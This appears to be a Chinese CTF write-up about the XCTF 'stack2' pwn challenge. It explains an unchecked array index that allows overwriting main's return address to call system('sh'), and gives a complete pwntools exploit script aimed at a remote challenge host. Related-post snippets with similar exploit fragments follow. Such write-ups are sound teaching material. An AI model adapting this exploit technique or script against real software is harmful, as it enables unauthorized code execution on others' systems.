pwn做题笔记13-stack2(以字节形式构造栈帧内容)

最新推荐文章于 2025-09-21 01:00:00 发布
原创 最新推荐文章于 2025-09-21 01:00:00 发布 · 265 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记

文章详细分析了一个程序的安全设置,包括开启的canary和栈不可执行保护,但未开启ALSR。通过ida静态分析和gdb动态调试,发现程序存在数组越界读写的漏洞。由于程序是小端序,作者利用栈溢出构造ROP链,目标是调用system函数执行sh。然而,远程主机没有bash,所以最初的目标无效,改为寻找并利用plt表中的system条目。最终,作者编写了pwn脚本,成功地修改栈中的返回地址和参数,以执行系统命令。

0x1

检查安全机制,开启了canary、栈不可执行,没开ALSR:

 0x2

运行程序,有四个功能:

ida静态分析,没有溢出漏洞,但是在改变数字时没有对数组索引作校验,因此可以越界读写

 0x3

数组类型是char,因此每个单元1字节,p32程序栈帧大小4字节,因此每个栈帧对应4个数组单元:

栈结构如下:

 与返回地址偏移0x70+0x4字节

但是,实际上利用0x74作偏移时是不行的,原因在于main的最后修改了esp的值,因此返回地址应该是修改后的esp的下方4字节

 用gdb在ret下断点作动态分析:

可以看到lea指令实际效果是esp+10,因此,真正的返回地址偏移起始位置是0x84

0x4 

由于程序是小端序,因此栈低地址(靠近栈顶)存放低位地址,即对于hack_here首条指令地址0x0804859B:

数组下标0x84-0x87存放0x9B、0x85、0x04、0x08实现调用/bin/bash

0x5

但是!远程主机没有bash,因此这个hack_here是无效的

发现plt表有system条目:

 ROPgardget查找字符串sh:

因此,数组下标0x84-0x87存放0x50、0x84、0x04、0x08,即返回地址

system形参有两个,一般是0、内容,因此:

  • 数组下标0x88-0x8B跳过或写0
  • 数组下标0x8C-0x8F存放sh字符串地址,即0x87、0x89、0x04、0x08

 由于有那个+10,这里就不画栈结构了,代码如下:

from pwn import*

context(os='linux', arch='amd64',log_level = 'debug')

p=remote("61.147.171.105", 51684)
#p=process("./3f")
p.sendlineafter(" have:","1")
p.sendlineafter("numbers","1")
p.sendlineafter("5. exit","3")
#0x080485D0
p.sendlineafter("which number to change:",str(int(0x84)))
p.sendlineafter("new number:",str(0x50))

p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x85)))
p.sendlineafter("new number:",str(int(0x84)))

p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x86)))
p.sendlineafter("new number:",str(int(0x04)))

p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x87)))
p.sendlineafter("new number:",str(int(0x08)))


#0x08048ab3
p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x8C)))
p.sendlineafter("new number:",str(int(0x87)))

p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x8D)))
p.sendlineafter("new number:",str(int(0x89)))

p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x8E)))
p.sendlineafter("new number:",str(int(0x04)))

p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x8F)))
p.sendlineafter("new number:",str(int(0x08)))

p.sendlineafter("5. exit","5")
p.interactive()

运行结果:

 0x6

注意一下:

  • 这里利用的是main结束后的ret
  • 利用IO向内存直接写16进制数据要先把十六进制转int,再转str,即str(int(0x1)),否则是无效的
_alpaca_
关注
stack2 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列15
重新启程
12-23 1565
题目地址:stack2 这是高手进阶区的第四题了,速度挺快啊,朋友!加油! 废话不说,看看题目先 没有什么特别的内容,那就看看保护机制 root@mypwn:/ctf/work/python/stack2# checksec fcca8ceb507544d1bd9c4a7925907a1d [*] '/ctf/work/python/stack2/fcca8ceb507544d1b...
网络攻防初学者记录10.03-补充
2301_78571744的博客
10-03 1487
发现他要你去看http response,那么打开burpsite(我下载的是免费版,然后麻烦的是每次网页抓包时都需要设置一下系统的代理127.0.01:8080,burpsite中的代理是默认不用管。等burpsite打开后,进入页面再选择intercept on,就绪后,点击sign up,burpsite就会弹出下面图示,记住一定要观察是否是post,我们要从post方式修改内容。最后一个c["n"],它比较特别,他是由两个元素组成,c["n"]是数组,c["n"][0]也是数组
pwnstack-攻防世界
最新发布
2301_79910343的博客
09-21 259
5.ls查看文件,然后发现有一个叫flag的文件,cat查看文件,得到flag。3.找到后门函数的开始地址。1.检查程序安全机制。
数据结构-(C语言代码)
weixin_50246370的博客
08-12 5913
stack)又名堆,它是一种运算受限的线性表。限定仅在表尾进行插入和删除操作的线性表。这一端被称为顶,相对地,把另一端称为底。向一个插入新元素又称作进、入或压,它是把新元素放到顶元素的上面,使之成为新的顶元素;从一个删除元素又称作出或退,它是把顶元素删除掉,使其相邻的元素成为新的顶元素。 #include <stdio.h> #include <stdlib.h> typedef struct Node { int data; struct.
pwnstack2
醉等佳人归
09-07 466
1.题目 1.保护机制 开了canary和nx 2.题目 简单来说就是一个计算器,支持以下功能: 2.思路 重点1:问题出在第三个功能上,第三个功能是支持修改数组中的元素的,但函数没有进行index判断,导致我们通过这个偏移写任意数据到任意偏移地址,即可以覆盖函数返回地址 重点2:程序中给了一个后门函数,但是运行后发现没有/bin/bash,所以我们要自己调用system,参数的话直接使用/bin/bash中的sh即可 from pwn import * context(arch="i386",os=
pwn学习笔记stack
m0_68956519的博客
02-25 932
之后caller函数调用结束,并继续调用下一个函数还记得最开始讲的cpu存储访问顺序吗?如果我们可以在一些危险函数get(),或者没有严格限制的read函数输入超过对应地址存储量的字符串,就可以覆盖掉返回地址,在函数调用结束时,返回地址就会被送入eip寄存器中,从而我们能够执行我们想要的动作。系统是由高地址往低地址增长的, 而数据的写入(局部变量)是按低地址到高地址的顺序写入. 如果程序没有对输入的字符数量做出限制, 就存在数据溢出当前以及覆盖返回地址的可能, 从而实现控制程序的执行流.
pwn学习笔记(11)--off_by_one
qq_66013948的博客
11-09 1042
​ 多次输入几个a之后,发现了最后输出的时候输出了17个a,我的目的仅仅只是需要16个a,结果输出了17个a,像这种,在写入字符串的时候多写入了一个字节的情况,就是off by one。prev_sizeprev_sizeprev_sizeprev_size​ 最新版本代码中,已加入针对 2 中后一种方法的 check ,但是在 2.28 及之前版本并没有该 check。
pwn学习笔记(8)--初识Pwn沙箱
qq_66013948的博客
08-06 1784
​ 沙箱机制,英文sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。​ 安全计算模式seccomp(Secure Computing Mode)在Linux2.6.10之后引入到kernel的特性,可用其实现一个沙箱环境。使用seccomp模式可以定义系统调用白名单和黑名单。seccomp机制用于限制应用程序可以使用的系统调用,增加系统的安全性。​ 在ctf中主要通过两种方
ctfshow做题笔记溢出—pwn65~pwn68
Yilanchia的博客
03-09 907
首先这道题并没有开启NX,我们任然可以注入shellcode,但是我们拟在 var_1010 中写入shellcode的地址并执行,因为程序最后读取了一个地址然后执行,这里可以执行shellcode,但是shellcode的参数写在哪里呢,似乎seed是个不错的选则,但是seed的准确地址我们无从得知,所以这个滑坡可以起到很大的作用,特别注意下面的类似的代码,cdqe 是一条指令,它的作用是将 32 位寄存器 EAX 的值扩展到 64 位寄存器 RAX 中。3是一个定值,就是v2的地址到seed的距离。
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 6868
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2352
pwn 入门
xctf pwn高手进阶题之stack2
neuisf的博客
01-25 382
程序读取一个数字n,然后根据数字n读取数字到缓冲区,在执行需修改操作时为判断是否越界,而是根据用户输入的数字进行修改,造成堆地址内容修改。只需修改返回值即可。此题提供了hackhere函数输出flag,本地执行正常,远程出错,提示找不到/bin/bash。此处,技巧是执行system(’sh’)代替system(’/bin/sh’)。 exp: from pwn import * p=remot...
pwn-stack-wp
diaojian3887的博客
08-29 259
stack2 知识点:数组溢出 正文 程序拖入IDA进行反编译,查看逻辑。 既然发现了溢出点,那么就是确定我们的ret地址和数组第一位数据的距离问题。我们使用gdb进行动态调试。 在0x0804884D进行下断点。我们根据选项去更改数组中第一位的数据。得到数组起始地址为0xffffcef8。 找到起始地址之后,我们去寻找执行ret指令时,的地址然后求其差值即可。...
PWN入门&Protostar靶场Stack系列
每天一小步,进步一大截
01-24 1552
pwn入门靶场笔记
运行时结构
七月听雪的博客
12-29 127
2.操作数 3.动态规划: 4.方法返回地址: 5.附加信息: http://www.360doc.com/content/14/0925/13/1073512_412236522.shtml https://blog.youkuaiyun.com/xtayfjpk/article/details/41924283 ...
了解结构
na_hanqiannan的博客
05-13 2582
内存的分配方式有三种:●从静态区域分配  内存在程序编译的时候就已经分配好,这块内存在程序的整个运行期间都存在。如 全局变量、stasic变量●在上创建  在执行函数时,函数内局部变量的存储单元都可以在上创建,函数执行结束时这些存储单元自动被释放。内存分配运算内置于处理器的指令集中,效率很高,但是分配的内存容量有限。●从堆上分配(动态内存分配)  程序在运行的时候用malloc或new(c+...
pwn stack2
weixin_45677731的博客
03-15 242
拖进32位ida 大致分析一波,这个程序就是你可以往这里面存一些数字,然后选择展示数字,增加数字等操作,这题我又学到了一个新的较为隐蔽的漏洞:数组溢出 看这里,当我们选择3,add number选项时,虽然v13数组定义的是100个,但是对v5没有任何的检测,这样一来,我们就能修改任意一个数字,包括100个开外的数据,我们可以利用这一点,改变返回地址等参数 这里的hackhere是用不了的,...
过程(结构是干货)
weixin_30820077的博客
07-26 309
【0】写在前面 过程(结构是干货);本文总结于csapp, 加上自己的理解; 【1】结构 每个函数的每次调用,都有它自己独立的一个,这个中维持着所需要的各种信息。 过程调用:函数调用另一个词语表示叫作过程; IA32 程序 用程序 来支持过程调用; 【2】转移控制 (此处非常重要:关系到对函数调用和返回理解是否到位...
鹏城实验室2021 pwn题解析:off-by-null漏洞利用
Pwn题目是为参赛者准备的一系列带有漏洞的二进制程序,目的是让参赛者发现并利用这些漏洞以获取更高的分数,这种活动在CTF(Capture The Flag)比赛中非常常见。 2. Off-by-null漏洞: Off-by-null是一种堆溢出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值